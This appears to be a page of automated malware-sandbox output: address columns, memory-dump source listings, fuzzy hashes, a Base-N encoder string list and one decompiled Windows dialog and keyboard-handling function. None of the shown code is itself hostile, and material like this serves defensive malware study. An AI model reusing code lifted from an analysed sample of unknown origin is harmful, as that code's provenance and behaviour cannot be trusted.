                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811c4
                                                                                                                0x012811c6
                                                                                                                0x012811ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811ce
                                                                                                                0x012811d0
                                                                                                                0x012811d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811d8
                                                                                                                0x012811db
                                                                                                                0x012811de
                                                                                                                0x012811e1
                                                                                                                0x012811e3
                                                                                                                0x012811e5
                                                                                                                0x012811e7
                                                                                                                0x012811e7
                                                                                                                0x012811ea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811ef
                                                                                                                0x012811f2
                                                                                                                0x012811f5
                                                                                                                0x012811f8
                                                                                                                0x012811fa
                                                                                                                0x012811fb
                                                                                                                0x01281201
                                                                                                                0x01281203
                                                                                                                0x01281205
                                                                                                                0x0128120f
                                                                                                                0x0128120f
                                                                                                                0x01281211
                                                                                                                0x00000000
                                                                                                                0x01281207
                                                                                                                0x01281207
                                                                                                                0x01281209
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281209
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281357
                                                                                                                0x0128135a
                                                                                                                0x0128135d
                                                                                                                0x0128135f
                                                                                                                0x01281361
                                                                                                                0x012811a3
                                                                                                                0x012811a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281368
                                                                                                                0x0128136b
                                                                                                                0x0128136d
                                                                                                                0x01281370
                                                                                                                0x01281372
                                                                                                                0x01281374
                                                                                                                0x01281375
                                                                                                                0x01281376
                                                                                                                0x01281377
                                                                                                                0x01281378
                                                                                                                0x0128137b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128130b
                                                                                                                0x0128130b
                                                                                                                0x01281311
                                                                                                                0x01281314
                                                                                                                0x01281317
                                                                                                                0x01281319
                                                                                                                0x0128131a
                                                                                                                0x0128131f
                                                                                                                0x01281322
                                                                                                                0x01281326
                                                                                                                0x0128132c
                                                                                                                0x0128132e
                                                                                                                0x01281330
                                                                                                                0x0128133a
                                                                                                                0x01281340
                                                                                                                0x01281342
                                                                                                                0x01281346
                                                                                                                0x0128134a
                                                                                                                0x0128134d
                                                                                                                0x01281212
                                                                                                                0x01281212
                                                                                                                0x01281215
                                                                                                                0x01281215
                                                                                                                0x00000000
                                                                                                                0x01281332
                                                                                                                0x01281332
                                                                                                                0x01281334
                                                                                                                0x012813e9
                                                                                                                0x012813e9
                                                                                                                0x012813ee
                                                                                                                0x012813ee
                                                                                                                0x012813f1
                                                                                                                0x012813f3
                                                                                                                0x012813fb
                                                                                                                0x012813fc
                                                                                                                0x012813fc
                                                                                                                0x01281400
                                                                                                                0x01281405
                                                                                                                0x01281406
                                                                                                                0x01281409
                                                                                                                0x0128140d
                                                                                                                0x0128140f
                                                                                                                0x01281411
                                                                                                                0x01281417
                                                                                                                0x01281419
                                                                                                                0x0128141a
                                                                                                                0x01281420
                                                                                                                0x01281420
                                                                                                                0x01281422
                                                                                                                0x01281428
                                                                                                                0x0128142e
                                                                                                                0x01281432
                                                                                                                0x01281434
                                                                                                                0x01281436
                                                                                                                0x0128143e
                                                                                                                0x0128143e
                                                                                                                0x01281441
                                                                                                                0x01281441
                                                                                                                0x01281446
                                                                                                                0x0128144c
                                                                                                                0x01281452
                                                                                                                0x01281454
                                                                                                                0x01281457
                                                                                                                0x01281459
                                                                                                                0x0128145b
                                                                                                                0x01281460
                                                                                                                0x01281460
                                                                                                                0x01281463
                                                                                                                0x01281463
                                                                                                                0x01281468
                                                                                                                0x0128146b
                                                                                                                0x0128146d
                                                                                                                0x01281470
                                                                                                                0x01281472
                                                                                                                0x01281474
                                                                                                                0x01281479
                                                                                                                0x01281479
                                                                                                                0x0128147c
                                                                                                                0x0128147c
                                                                                                                0x01281481
                                                                                                                0x01281484
                                                                                                                0x01281489
                                                                                                                0x0128148f
                                                                                                                0x0128149b
                                                                                                                0x0128149e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281334
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128118e
                                                                                                                0x01281191
                                                                                                                0x01281196
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811b4
                                                                                                                0x012811b6
                                                                                                                0x012811b8
                                                                                                                0x012811ba
                                                                                                                0x012811bc
                                                                                                                0x012811bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281187
                                                                                                                0x01281181
                                                                                                                0x01281179
                                                                                                                0x01281173
                                                                                                                0x01281139
                                                                                                                0x012814a3
                                                                                                                0x012814a3
                                                                                                                0x012814a6
                                                                                                                0x012814ac
                                                                                                                0x012814b0
                                                                                                                0x012814d4
                                                                                                                0x012814d7
                                                                                                                0x012814da
                                                                                                                0x012814dd
                                                                                                                0x012814df
                                                                                                                0x00000000
                                                                                                                0x012814f0
                                                                                                                0x012814f3
                                                                                                                0x012814f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281552
                                                                                                                0x01281555
                                                                                                                0x01281558
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128150c
                                                                                                                0x01281512
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281516
                                                                                                                0x0128151c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814fc
                                                                                                                0x012814ff
                                                                                                                0x01281502
                                                                                                                0x01281504
                                                                                                                0x01281507
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281526
                                                                                                                0x0128152b
                                                                                                                0x0128152e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281536
                                                                                                                0x01281539
                                                                                                                0x0128153b
                                                                                                                0x0128153f
                                                                                                                0x01281542
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281546
                                                                                                                0x01281549
                                                                                                                0x0128154c
                                                                                                                0x0128154d
                                                                                                                0x0128154e
                                                                                                                0x0128154f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814df
                                                                                                                0x012814b2
                                                                                                                0x012814b4
                                                                                                                0x012814b9
                                                                                                                0x012814bf
                                                                                                                0x012814c1
                                                                                                                0x012814c3
                                                                                                                0x00000000
                                                                                                                0x012814c5
                                                                                                                0x012814c9
                                                                                                                0x00000000
                                                                                                                0x012814c9
                                                                                                                0x012814c3
                                                                                                                0x012814b0
                                                                                                                0x00000000
                                                                                                                0x012814a6
                                                                                                                0x01281571
                                                                                                                0x01281576
                                                                                                                0x01281576
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog3__cftof_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 143158665-0
                                                                                                                • Opcode ID: 9bbc317e724928c1b944d24803564275a35bf638e7e83940fd87ba478b08f943
                                                                                                                • Instruction ID: 917942831bfb12d1977b7ee5eb4fbabba576a6b607672ab380755a1fc8d8160b
                                                                                                                • Opcode Fuzzy Hash: 9bbc317e724928c1b944d24803564275a35bf638e7e83940fd87ba478b08f943
                                                                                                                • Instruction Fuzzy Hash: F402D4B1D1121ADFEF15EFA8D880AADBBB5FF14304F144069E906AB3D4DB709962CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10069010, Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 358COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10068CF0: __CxxThrowException@8.LIBCMT ref: 10068E45
                                                                                                                  • Part of subcall function 10063B30: __CxxThrowException@8.LIBCMT ref: 10063C85
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10069173
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10069326
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                  • Part of subcall function 10068E80: __CxxThrowException@8.LIBCMT ref: 10068FD5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: BaseN_Decoder$BaseN_Decoder: Log2Base must be between 1 and 7 inclusive$BaseN_Encoder$BaseN_Encoder: Log2Base must be between 1 and 7 inclusive$DecodingLookupArray$EncodingLookupArray$GroupSize$Grouper$Log2Base$Pad$PaddingByte$Separator$Terminator
                                                                                                                • API String ID: 3476068407-2095131268
                                                                                                                • Opcode ID: b7371f6f25d4d98f24b0c9c959688b8d243836e0bfaef268712a501cdc9f10f0
                                                                                                                • Instruction ID: a2ac563606a13d01f2ef6dda559e7261c9b25ff47164832d05a5422bb9de3df8
                                                                                                                • Opcode Fuzzy Hash: b7371f6f25d4d98f24b0c9c959688b8d243836e0bfaef268712a501cdc9f10f0
                                                                                                                • Instruction Fuzzy Hash: 6BD19DB4208381AFD704CF58C850B9BBBE6FF89724F104A1DF59587681DB75E909CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127CE89, Relevance: 25.9, APIs: 17, Instructions: 393windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0127CE89(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				int _t121;
				signed int _t124;
				struct tagMSG* _t126;
				signed int _t127;
				int _t128;
				void* _t131;
				signed int _t133;
				void* _t139;
				signed char _t143;
				signed int _t144;
				signed int _t147;
				signed int _t150;
				signed int _t152;
				signed char _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				short _t168;
				signed int _t169;
				signed int _t170;
				struct tagMSG* _t175;
				signed int _t176;
				signed int _t177;
				short _t179;
				int _t180;
				void* _t182;
				signed int _t188;
				signed int _t189;
				signed int _t191;
				void* _t194;
				signed int _t204;
				void* _t205;
				signed int _t206;
				signed int _t209;
				signed int _t214;
				int _t216;
				void* _t219;

				_t206 = __edx;
				_t189 = __ecx;
				_push(0x28);
				E01285BE3(E012980E5, __ebx, __edi, __esi);
				_t188 =  *(_t219 + 8);
				_t216 = 0;
				if(_t188 != 0) {
					 *(_t219 - 0x2c) =  *(_t188 + 0x20);
				} else {
					 *(_t219 - 0x2c) = 0;
				}
				 *(_t219 - 0x14) =  *(_t219 + 0xc)->message;
				 *(_t219 - 0x30) = GetFocus();
				_t209 = E0126B33E(_t188, _t189, _t206, _t119);
				_t121 =  *(_t219 - 0x14);
				 *(_t219 - 0x1c) = _t209;
				if(_t121 < 0x100 || _t121 > 0x109) {
					_t189 = 9;
					 *(_t219 - 0x20) = _t189;
					__eflags = _t121 + 0xfffffe00 - _t189;
					if(_t121 + 0xfffffe00 > _t189) {
						goto L36;
					}
					goto L7;
				} else {
					 *(_t219 - 0x20) = 9;
					L7:
					if(_t209 == 0) {
						L36:
						_t123 =  *(_t219 + 0xc);
						L28:
						_t124 = E0126B33E(_t188, _t189, _t206, _t123->hwnd);
						_t207 = _t124;
						 *(_t219 - 0x24) = _t124;
						 *(_t219 - 0x18) = _t216;
						 *(_t219 - 0x28) = _t216;
						_t191 =  *(_t219 - 0x14) - 0x100;
						__eflags = _t191;
						if(_t191 == 0) {
							_t207 = E0127D878(_t207,  *(_t219 + 0xc));
							_t126 =  *(_t219 + 0xc);
							_t192 = _t126->wParam & 0x0000ffff;
							__eflags = _t192 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t192 - 0x25;
								if(_t192 < 0x25) {
									L83:
									__eflags =  *(_t188 + 0x58) & 0x00001000;
									if(( *(_t188 + 0x58) & 0x00001000) != 0) {
										L47:
										L48:
										_t127 = IsWindow( *(_t219 - 0x30));
										__eflags = _t127;
										if(_t127 != 0) {
											_t131 = E0126B33E(_t188, _t192, _t207, GetFocus());
											_t211 =  *(_t219 - 0x1c);
											E0127D48B(_t192,  *(_t219 - 0x1c), _t131);
											_pop(_t194);
											_t133 = IsWindow( *(_t219 - 0x2c));
											__eflags = _t133;
											if(_t133 != 0) {
												E0127D50E(_t207, _t188, _t211, E0126B33E(_t188, _t194, _t207, GetFocus()));
											}
										}
										_t128 = _t216;
										L52:
										return E01285B48(_t128);
									}
									_t216 = IsDialogMessageA( *(_t188 + 0x20), _t126);
									__eflags = _t216;
									if(_t216 == 0) {
										goto L47;
									}
									_t139 = E0126B33E(_t188, _t192, _t207, GetFocus());
									__eflags = _t139 - _t209;
									if(_t139 != _t209) {
										E0127D41A(_t192, _t207, E0126B33E(_t188, _t192, _t207, GetFocus()));
										_pop(_t192);
									}
									goto L48;
								}
								__eflags = _t192 - 0x26;
								if(_t192 <= 0x26) {
									 *(_t219 - 0x28) = 1;
									L91:
									_t143 = E0127D878(_t209, _t126);
									__eflags = _t143 & 0x00000001;
									if((_t143 & 0x00000001) != 0) {
										L82:
										_t126 =  *(_t219 + 0xc);
										goto L83;
									}
									__eflags =  *(_t219 - 0x28);
									_t192 = _t188;
									_push(_t216);
									if( *(_t219 - 0x28) == 0) {
										_t144 = E0126F4EC(_t188, _t192, _t209);
									} else {
										_t144 = E0126F6CD(_t188, _t192, _t209);
									}
									 *(_t219 - 0x24) = _t144;
									__eflags = _t144;
									if(_t144 == 0) {
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t144 + 8)) - _t216;
										if( *((intOrPtr*)(_t144 + 8)) != _t216) {
											E0126FA17(_t188, _t144);
											_t144 =  *(_t219 - 0x24);
										}
										_t192 =  *(_t144 + 4);
										__eflags = _t192;
										if(_t192 != 0) {
											L62:
											 *((intOrPtr*)( *_t192 + 0xac))( *(_t219 + 0xc));
											goto L46;
										} else {
											__eflags =  *_t144 - _t192;
											if( *_t144 == _t192) {
												_t147 = E0127CE65(_t188, _t209,  *(_t219 - 0x28));
												_t192 = _t147;
												 *(_t219 + 8) = _t147;
											} else {
												_t192 = E0126B33E(_t188, _t192, _t207,  *_t144);
												 *(_t219 + 8) = _t192;
											}
											__eflags = _t192;
											if(_t192 == 0) {
												goto L82;
											} else {
												 *( *((intOrPtr*)(_t188 + 0x68)) + 0x70) = _t216;
												E0127D5EB(_t188, _t192);
												_t150 =  *(_t219 - 0x24);
												__eflags =  *((intOrPtr*)(_t150 + 8)) - _t216;
												if( *((intOrPtr*)(_t150 + 8)) != _t216) {
													_t152 = GetWindowLongA( *( *(_t219 + 8) + 0x20), 0xfffffff4);
													SendMessageA( *( *(_t219 + 8) + 0x20), 0xf1, "true", _t216);
													SendMessageA( *(_t188 + 0x20), 0x111, _t152 & 0x0000ffff,  *( *(_t219 + 8) + 0x20));
													E0127D5EB(_t188,  *(_t219 + 8));
												}
												L46:
												_t216 = 1;
												__eflags = 1;
												goto L47;
											}
										}
									}
								}
								__eflags = _t192 - 0x28;
								if(_t192 <= 0x28) {
									goto L91;
								}
								__eflags = _t192 - 0x2b;
								if(_t192 != 0x2b) {
									goto L83;
								}
								L72:
								__eflags = _t207 & 0x00000004;
								if((_t207 & 0x00000004) != 0) {
									goto L83;
								}
								_t161 = E0127CE3F(_t188, _t207, _t209);
								__eflags = _t161 & 0x00000010;
								if((_t161 & 0x00000010) == 0) {
									_t162 = E0127DA72(_t188);
								} else {
									 *(_t219 - 0x18) = _t209;
									_t162 = E0126F3AD(_t209);
								}
								_t192 = _t162;
								_t163 =  *(_t219 - 0x18);
								__eflags = _t163;
								if(_t163 != 0) {
									L80:
									_t192 = _t163;
									_t164 = E0126F89B(_t163);
									__eflags = _t164;
									if(_t164 != 0) {
										_t165 =  *(_t219 - 0x18);
										__eflags =  *((intOrPtr*)(_t165 + 0x6c)) - _t216;
										if( *((intOrPtr*)(_t165 + 0x6c)) == _t216) {
											goto L82;
										}
										_push(_t216);
										_push(_t216);
										_push(_t216);
										_push("true");
										_push(0xfffffdd9);
										_push(_t165);
										 *(_t219 - 4) = _t216;
										E0126F7FB();
										 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
										goto L46;
									}
									MessageBeep(_t216);
									goto L82;
								} else {
									L79:
									_t163 = E0127D61C(_t207, _t188, _t192);
									 *(_t219 - 0x18) = _t163;
									__eflags = _t163;
									if(_t163 == 0) {
										goto L82;
									}
									goto L80;
								}
							}
							if(__eflags == 0) {
								L78:
								_t192 = 2;
								goto L79;
							}
							__eflags = _t192 - 3;
							if(_t192 == 3) {
								goto L78;
							}
							__eflags = _t192 -  *(_t219 - 0x20);
							if(_t192 ==  *(_t219 - 0x20)) {
								__eflags = _t207 & 0x00000002;
								if((_t207 & 0x00000002) != 0) {
									goto L83;
								}
								_t168 = GetKeyState(0x10);
								__eflags = _t168;
								 *(_t219 + 8) = 0 | _t168 < 0x00000000;
								_t192 = _t188;
								_t169 = E0126F53E(_t188, _t207, _t216, _t168 < 0);
								__eflags = _t169;
								if(_t169 == 0) {
									goto L82;
								}
								_t192 =  *(_t169 + 4);
								__eflags = _t192;
								if(_t192 == 0) {
									__eflags =  *_t169;
									if( *_t169 == 0) {
										_t170 = E012678BB(_t188,  *(_t219 - 0x24),  *(_t219 + 8));
										_t192 = _t170;
										 *(_t219 + 0xc) = _t170;
									} else {
										_t192 = E0126B33E(_t188, _t192, _t207,  *_t169);
										 *(_t219 + 0xc) = _t192;
									}
									__eflags = _t192;
									if(_t192 != 0) {
										 *( *((intOrPtr*)(_t188 + 0x68)) + 0x70) = _t216;
										E0127D5EB(_t188, _t192);
										E0127D48B(_t192, _t209,  *(_t219 + 0xc));
										_pop(_t192);
									}
									goto L46;
								}
								goto L62;
							}
							__eflags = _t192 - 0xd;
							if(_t192 == 0xd) {
								goto L72;
							}
							goto L83;
						}
						_t204 = _t191;
						__eflags = _t204;
						if(_t204 == 0) {
							_t175 =  *(_t219 + 0xc);
							L38:
							_t176 = E0127D878(_t207, _t175);
							__eflags =  *(_t219 - 0x14) - 0x102;
							_t192 = _t176;
							if( *(_t219 - 0x14) != 0x102) {
								L40:
								_t126 =  *(_t219 + 0xc);
								_t207 = _t126->wParam & 0x0000ffff;
								__eflags = _t207 -  *(_t219 - 0x20);
								if(_t207 !=  *(_t219 - 0x20)) {
									L42:
									_t192 = 0x20;
									__eflags = _t207 - _t192;
									if(_t207 == _t192) {
										L25:
										_t128 = 0;
										goto L52;
									}
									_t177 = E0127D8A8(_t192, _t207, _t188,  *(_t219 - 0x24), _t126);
									__eflags = _t177;
									if(_t177 == 0) {
										goto L82;
									}
									_t192 =  *(_t177 + 4);
									__eflags =  *(_t177 + 4);
									if( *(_t177 + 4) == 0) {
										goto L82;
									}
									_push( *(_t219 + 0xc));
									E0127B869(_t188, _t192);
									goto L46;
								}
								__eflags = _t192 & 0x00000002;
								if((_t192 & 0x00000002) != 0) {
									goto L83;
								}
								goto L42;
							}
							__eflags = _t192 & 0x00000084;
							if((_t192 & 0x00000084) != 0) {
								goto L82;
							}
							goto L40;
						}
						_t192 = _t204 != 4;
						__eflags = _t204 != 4;
						if(_t204 != 4) {
							goto L82;
						}
						__eflags = _t209;
						if(_t209 != 0) {
							L34:
							_t126 =  *(_t219 + 0xc);
							_t192 = 0x20;
							__eflags = _t126->wParam - _t192;
							if(_t126->wParam == _t192) {
								goto L83;
							}
							goto L38;
						}
						_t179 = GetKeyState(0x12);
						__eflags = _t179;
						if(_t179 >= 0) {
							goto L82;
						}
						_t207 =  *(_t219 - 0x24);
						goto L34;
					}
					while( *(_t209 + 0x6c) == _t216 && E0126B33E(_t188, _t189, _t206, GetParent( *(_t209 + 0x20))) != _t188) {
						_t209 = E0126B33E(_t188, _t189, _t206, GetParent( *(_t209 + 0x20)));
						if(_t209 != 0) {
							continue;
						}
						break;
					}
					if(_t209 == 0) {
						L16:
						_t180 =  *(_t219 - 0x14);
						__eflags = _t180 - 0x101;
						if(_t180 == 0x101) {
							L19:
							__eflags = _t209;
							if(_t209 == 0) {
								L26:
								_t123 =  *(_t219 + 0xc);
								L27:
								_t209 =  *(_t219 - 0x1c);
								goto L28;
							}
							_t206 =  *(_t209 + 0x6c);
							__eflags = _t206;
							if(_t206 == 0) {
								goto L26;
							}
							_t123 =  *(_t219 + 0xc);
							_t205 = 0xd;
							_t214 =  *(_t219 + 0xc)->wParam & 0x0000ffff;
							__eflags = _t214 - _t205;
							if(_t214 != _t205) {
								L23:
								_t189 = 0x1b;
								__eflags = _t214 - _t189;
								if(_t214 != _t189) {
									goto L27;
								}
								__eflags =  *(_t206 + 0x84) & 0x00000002;
								if(( *(_t206 + 0x84) & 0x00000002) == 0) {
									goto L27;
								}
								goto L25;
							}
							__eflags =  *(_t206 + 0x84) & 0x00000001;
							if(( *(_t206 + 0x84) & 0x00000001) != 0) {
								goto L25;
							}
							goto L23;
						}
						__eflags = _t180 - 0x100;
						if(_t180 == 0x100) {
							goto L19;
						}
						__eflags = _t180 - 0x102;
						if(_t180 != 0x102) {
							goto L26;
						}
						goto L19;
					}
					_t189 =  *(_t209 + 0x6c);
					if(_t189 == 0) {
						goto L16;
					}
					_t189 =  *(_t189 + 0x58);
					if(_t189 == 0) {
						goto L16;
					}
					_t182 =  *((intOrPtr*)( *_t189 + 0x14))(_t189,  *(_t219 + 0xc));
					if(_t182 != 0) {
						goto L16;
					}
					_t128 = _t182 + 1;
					goto L52;
				}
			}









































                                                                                                                0x0127ce89
                                                                                                                0x0127ce89
                                                                                                                0x0127ce89
                                                                                                                0x0127ce90
                                                                                                                0x0127ce95
                                                                                                                0x0127ce98
                                                                                                                0x0127ce9c
                                                                                                                0x0127cea6
                                                                                                                0x0127ce9e
                                                                                                                0x0127ce9e
                                                                                                                0x0127ce9e
                                                                                                                0x0127ceaf
                                                                                                                0x0127ceb9
                                                                                                                0x0127cec1
                                                                                                                0x0127cec3
                                                                                                                0x0127cec6
                                                                                                                0x0127cece
                                                                                                                0x0127cee2
                                                                                                                0x0127cee8
                                                                                                                0x0127ceeb
                                                                                                                0x0127ceed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127ced7
                                                                                                                0x0127ced7
                                                                                                                0x0127cef3
                                                                                                                0x0127cef5
                                                                                                                0x0127cffe
                                                                                                                0x0127cffe
                                                                                                                0x0127cfa6
                                                                                                                0x0127cfa8
                                                                                                                0x0127cfb0
                                                                                                                0x0127cfb2
                                                                                                                0x0127cfb5
                                                                                                                0x0127cfb8
                                                                                                                0x0127cfbb
                                                                                                                0x0127cfbb
                                                                                                                0x0127cfc1
                                                                                                                0x0127d0c6
                                                                                                                0x0127d0c8
                                                                                                                0x0127d0cb
                                                                                                                0x0127d0cf
                                                                                                                0x0127d0d2
                                                                                                                0x0127d187
                                                                                                                0x0127d18a
                                                                                                                0x0127d1f6
                                                                                                                0x0127d1f6
                                                                                                                0x0127d1fd
                                                                                                                0x0127d06b
                                                                                                                0x0127d071
                                                                                                                0x0127d074
                                                                                                                0x0127d07a
                                                                                                                0x0127d07c
                                                                                                                0x0127d081
                                                                                                                0x0127d086
                                                                                                                0x0127d08b
                                                                                                                0x0127d091
                                                                                                                0x0127d095
                                                                                                                0x0127d09b
                                                                                                                0x0127d09d
                                                                                                                0x0127d0ae
                                                                                                                0x0127d0ae
                                                                                                                0x0127d09d
                                                                                                                0x0127d0b3
                                                                                                                0x0127d0b5
                                                                                                                0x0127d0ba
                                                                                                                0x0127d0ba
                                                                                                                0x0127d20d
                                                                                                                0x0127d20f
                                                                                                                0x0127d211
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d21e
                                                                                                                0x0127d223
                                                                                                                0x0127d22b
                                                                                                                0x0127d23a
                                                                                                                0x0127d23f
                                                                                                                0x0127d23f
                                                                                                                0x00000000
                                                                                                                0x0127d22b
                                                                                                                0x0127d18c
                                                                                                                0x0127d18f
                                                                                                                0x0127d27f
                                                                                                                0x0127d286
                                                                                                                0x0127d288
                                                                                                                0x0127d28d
                                                                                                                0x0127d28f
                                                                                                                0x0127d1f3
                                                                                                                0x0127d1f3
                                                                                                                0x00000000
                                                                                                                0x0127d1f3
                                                                                                                0x0127d295
                                                                                                                0x0127d299
                                                                                                                0x0127d29b
                                                                                                                0x0127d29c
                                                                                                                0x0127d2a5
                                                                                                                0x0127d29e
                                                                                                                0x0127d29e
                                                                                                                0x0127d29e
                                                                                                                0x0127d2aa
                                                                                                                0x0127d2ad
                                                                                                                0x0127d2af
                                                                                                                0x00000000
                                                                                                                0x0127d2b5
                                                                                                                0x0127d2b5
                                                                                                                0x0127d2b8
                                                                                                                0x0127d2bd
                                                                                                                0x0127d2c2
                                                                                                                0x0127d2c2
                                                                                                                0x0127d2c5
                                                                                                                0x0127d2c8
                                                                                                                0x0127d2ca
                                                                                                                0x0127d12e
                                                                                                                0x0127d133
                                                                                                                0x00000000
                                                                                                                0x0127d2d0
                                                                                                                0x0127d2d0
                                                                                                                0x0127d2d2
                                                                                                                0x0127d2e8
                                                                                                                0x0127d2ed
                                                                                                                0x0127d2ef
                                                                                                                0x0127d2d4
                                                                                                                0x0127d2db
                                                                                                                0x0127d2dd
                                                                                                                0x0127d2dd
                                                                                                                0x0127d2f2
                                                                                                                0x0127d2f4
                                                                                                                0x00000000
                                                                                                                0x0127d2fa
                                                                                                                0x0127d2fe
                                                                                                                0x0127d301
                                                                                                                0x0127d306
                                                                                                                0x0127d309
                                                                                                                0x0127d30c
                                                                                                                0x0127d31a
                                                                                                                0x0127d336
                                                                                                                0x0127d34a
                                                                                                                0x0127d34f
                                                                                                                0x0127d34f
                                                                                                                0x0127d068
                                                                                                                0x0127d06a
                                                                                                                0x0127d06a
                                                                                                                0x00000000
                                                                                                                0x0127d06a
                                                                                                                0x0127d2f4
                                                                                                                0x0127d2ca
                                                                                                                0x0127d2af
                                                                                                                0x0127d195
                                                                                                                0x0127d198
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d19e
                                                                                                                0x0127d1a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d1a3
                                                                                                                0x0127d1a3
                                                                                                                0x0127d1a6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d1a9
                                                                                                                0x0127d1af
                                                                                                                0x0127d1b1
                                                                                                                0x0127d1c0
                                                                                                                0x0127d1b3
                                                                                                                0x0127d1b5
                                                                                                                0x0127d1b8
                                                                                                                0x0127d1b8
                                                                                                                0x0127d1c5
                                                                                                                0x0127d1c7
                                                                                                                0x0127d1ca
                                                                                                                0x0127d1cc
                                                                                                                0x0127d1e1
                                                                                                                0x0127d1e1
                                                                                                                0x0127d1e3
                                                                                                                0x0127d1e8
                                                                                                                0x0127d1ea
                                                                                                                0x0127d245
                                                                                                                0x0127d248
                                                                                                                0x0127d24b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d24d
                                                                                                                0x0127d24e
                                                                                                                0x0127d24f
                                                                                                                0x0127d250
                                                                                                                0x0127d252
                                                                                                                0x0127d257
                                                                                                                0x0127d258
                                                                                                                0x0127d25b
                                                                                                                0x0127d276
                                                                                                                0x00000000
                                                                                                                0x0127d276
                                                                                                                0x0127d1ed
                                                                                                                0x00000000
                                                                                                                0x0127d1ce
                                                                                                                0x0127d1d3
                                                                                                                0x0127d1d5
                                                                                                                0x0127d1da
                                                                                                                0x0127d1dd
                                                                                                                0x0127d1df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d1df
                                                                                                                0x0127d1cc
                                                                                                                0x0127d0d8
                                                                                                                0x0127d1d0
                                                                                                                0x0127d1d2
                                                                                                                0x00000000
                                                                                                                0x0127d1d2
                                                                                                                0x0127d0de
                                                                                                                0x0127d0e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d0e7
                                                                                                                0x0127d0ea
                                                                                                                0x0127d0fa
                                                                                                                0x0127d0fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127d105
                                                                                                                0x0127d10d
                                                                                                                0x0127d114
                                                                                                                0x0127d117
